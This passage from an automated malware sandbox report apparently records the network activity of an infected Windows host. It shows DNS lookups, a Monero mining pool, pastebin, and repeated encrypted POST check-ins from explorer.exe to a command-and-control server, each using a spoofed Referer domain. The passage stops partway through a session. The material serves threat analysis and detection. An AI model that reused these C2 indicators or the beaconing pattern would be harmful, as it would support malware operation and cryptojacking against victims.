                                                                                                                                                            Nov 10, 2023 15:35:35.161048889 CET192.168.2.61.1.1.10xdb68Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.635658026 CET192.168.2.61.1.1.10x369cStandard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:58.687995911 CET192.168.2.61.1.1.10x421Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:43.577436924 CET192.168.2.61.1.1.10x1abdStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:43.741874933 CET192.168.2.61.1.1.10x6a08Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:48.873960972 CET192.168.2.61.1.1.10xeb06Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:54.431557894 CET192.168.2.61.1.1.10x7a93Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:01.276964903 CET192.168.2.61.1.1.10x2097Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:10.140300035 CET192.168.2.61.1.1.10x38deStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:19.127515078 CET192.168.2.61.1.1.10xde5eStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:27.834459066 CET192.168.2.61.1.1.10x64dbStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:38.961184025 CET192.168.2.61.1.1.10xc671Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:39.124864101 CET192.168.2.61.1.1.10x2b47Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:48.744489908 CET192.168.2.61.1.1.10x73b7Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Nov 10, 2023 15:35:35.156881094 CET1.1.1.1192.168.2.60x9e33Name error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:35.855102062 CET1.1.1.1192.168.2.60xdb68No error (0)host-host-file8.com95.214.26.28A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org51.68.143.81A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org51.255.34.118A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org51.68.190.80A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org135.125.238.108A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET1.1.1.1192.168.2.60x369cNo error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:58.840703011 CET1.1.1.1192.168.2.60x421No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:58.840703011 CET1.1.1.1192.168.2.60x421No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:35:58.840703011 CET1.1.1.1192.168.2.60x421No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:43.730679989 CET1.1.1.1192.168.2.60x1abdName error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:44.106184006 CET1.1.1.1192.168.2.60x6a08No error (0)host-host-file8.com95.214.26.28A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:49.026984930 CET1.1.1.1192.168.2.60xeb06Name error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:36:54.587472916 CET1.1.1.1192.168.2.60x7a93Name error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:01.432312012 CET1.1.1.1192.168.2.60x2097Name error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:10.336200953 CET1.1.1.1192.168.2.60x38deName error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:19.281311035 CET1.1.1.1192.168.2.60xde5eName error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:27.991992950 CET1.1.1.1192.168.2.60x64dbName error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:39.115061998 CET1.1.1.1192.168.2.60xc671Name error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:39.853116989 CET1.1.1.1192.168.2.60x2b47No error (0)host-host-file8.com95.214.26.28A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 10, 2023 15:37:48.897876024 CET1.1.1.1192.168.2.60x73b7Name error (3)host-file-host6.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            • pastebin.com
                                                                                                                                                            • ocyugmcp.com
                                                                                                                                                              • host-host-file8.com
                                                                                                                                                            • tmugk.com
                                                                                                                                                            • rpfwsaim.org
                                                                                                                                                            • kegnkcpidq.com
                                                                                                                                                            • bxqfgpms.org
                                                                                                                                                            • jgdfwhycbb.com
                                                                                                                                                            • dqxfcxtqc.net
                                                                                                                                                            • sxcdcfkj.com
                                                                                                                                                            • jlmfcqwlhw.org
                                                                                                                                                            • pwlgf.net
                                                                                                                                                            • euufg.com
                                                                                                                                                            • kxuoq.net
                                                                                                                                                            • vebudrviog.org
                                                                                                                                                            • wrrdwyfsj.org
                                                                                                                                                            • criwvjvtwq.org
                                                                                                                                                            • jwddotbdq.org
                                                                                                                                                            • xmobe.org
                                                                                                                                                            • swunoda.org
                                                                                                                                                            • jyicmpi.com
                                                                                                                                                            • jbdwgxah.com
                                                                                                                                                            • hpfeeptar.org
                                                                                                                                                            • ydikox.net
                                                                                                                                                            • qcunmavvat.net
                                                                                                                                                            • kibrkvnbk.com
                                                                                                                                                            • rihjsppp.net
                                                                                                                                                            • mogop.com
                                                                                                                                                            • ebswgoa.net
                                                                                                                                                            • hodjcq.net
                                                                                                                                                            • vrhgpp.org
                                                                                                                                                            • mqetfsc.org
                                                                                                                                                            • rkucq.com
                                                                                                                                                            • vngcolxw.net
                                                                                                                                                            • liedn.net
                                                                                                                                                            • ldxhifgucj.com
                                                                                                                                                            • pemamjvcpk.org
                                                                                                                                                            • qcgvlxft.com
                                                                                                                                                            • ogmthh.net
                                                                                                                                                            • nlijd.org
                                                                                                                                                            • nugxs.org
                                                                                                                                                            • fotbgladl.net
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.649719172.67.34.170443C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.64971595.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:35:36.159581900 CET150OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://ocyugmcp.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 201
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:35:36.159661055 CET150OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 bd de 10
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d@FbL[on.^[-hkhVqu`1P?/Z-#8; }.C$`_Y5lmUZ>uw=fiH *\;mr'
                                                                                                                                                            Nov 10, 2023 15:35:36.457129002 CET151INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            10192.168.2.64973395.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:50.018204927 CET247OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://pwlgf.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 111
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:50.018291950 CET247OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 22 91 c4 32
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d"2hbTJ@5C`41q`8h
                                                                                                                                                            Nov 10, 2023 15:36:50.320105076 CET248INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            11192.168.2.64973495.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:50.814467907 CET248OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://euufg.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 202
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:50.814503908 CET249OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1d c1 a3 06
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d^3>knWJPQgzu{9?dw%L^<4o&j<x3)8@)Tns+9Hlr;H:mTi%T0R=dH[
                                                                                                                                                            Nov 10, 2023 15:36:51.115509033 CET249INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            12192.168.2.64973595.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:51.559272051 CET250OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://kxuoq.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 312
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:51.559272051 CET250OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 5d d9 bd 79
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d]yXhh@!HgCnPW<V.:V>Q<[Gd2e0R;3ll 0fPbpR3dXp0Gj&mR,<H:zP7\qqvXJ:_
                                                                                                                                                            Nov 10, 2023 15:36:51.858726025 CET250INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            13192.168.2.64973695.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:54.899068117 CET252OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://vebudrviog.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 173
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:54.899097919 CET252OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 a1 86 77
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d@wPLi[\RGk[{rGtx!"Hb ;$JH2q~7+_//wSN\2{_
                                                                                                                                                            Nov 10, 2023 15:36:55.200535059 CET252INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            14192.168.2.64973795.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:56.864502907 CET253OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://wrrdwyfsj.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 198
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:56.864552021 CET253OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 35 c5 8a 67
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d5gEs]tZ#kIE1/l0r>4!N;YvD ]t<G1OJMJ;A,e+2qBYv1E)
                                                                                                                                                            Nov 10, 2023 15:36:57.166098118 CET253INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            15192.168.2.64973895.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:01.946599960 CET254OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://criwvjvtwq.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 240
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:01.946645021 CET255OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 5d bf d8 63
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d]ca7jb296AMCv8j#3XAQgEW~].x3r/=Q2a{bQn:rc,|^<S_as7$Ua{#8K"{q{5m^w~Vu
                                                                                                                                                            Nov 10, 2023 15:37:02.246140957 CET255INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            16192.168.2.64973995.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:03.017003059 CET256OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://jwddotbdq.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 131
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:03.017036915 CET256OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4f 89 a0 04
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dO(qzJf[\!&LS'Nf8!1>@\=[
                                                                                                                                                            Nov 10, 2023 15:37:03.316585064 CET256INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            17192.168.2.64974095.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:06.420964956 CET257OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://xmobe.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 162
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:06.420991898 CET257OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 17 d1 d1 27
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d'3t3ab-UrN"loYopMl{0g |~i/]vyL4"akB(b'!W
                                                                                                                                                            Nov 10, 2023 15:37:06.721905947 CET257INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            18192.168.2.64974195.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:37:10.642767906 CET258OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://swunoda.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 131
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:37:10.643193960 CET258OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4b 83 8f 6b
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dKk=H ?_h$QvXc[/Uf)8/.}6N?8
                                                                                                                                                            Nov 10, 2023 15:37:10.942137957 CET259INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
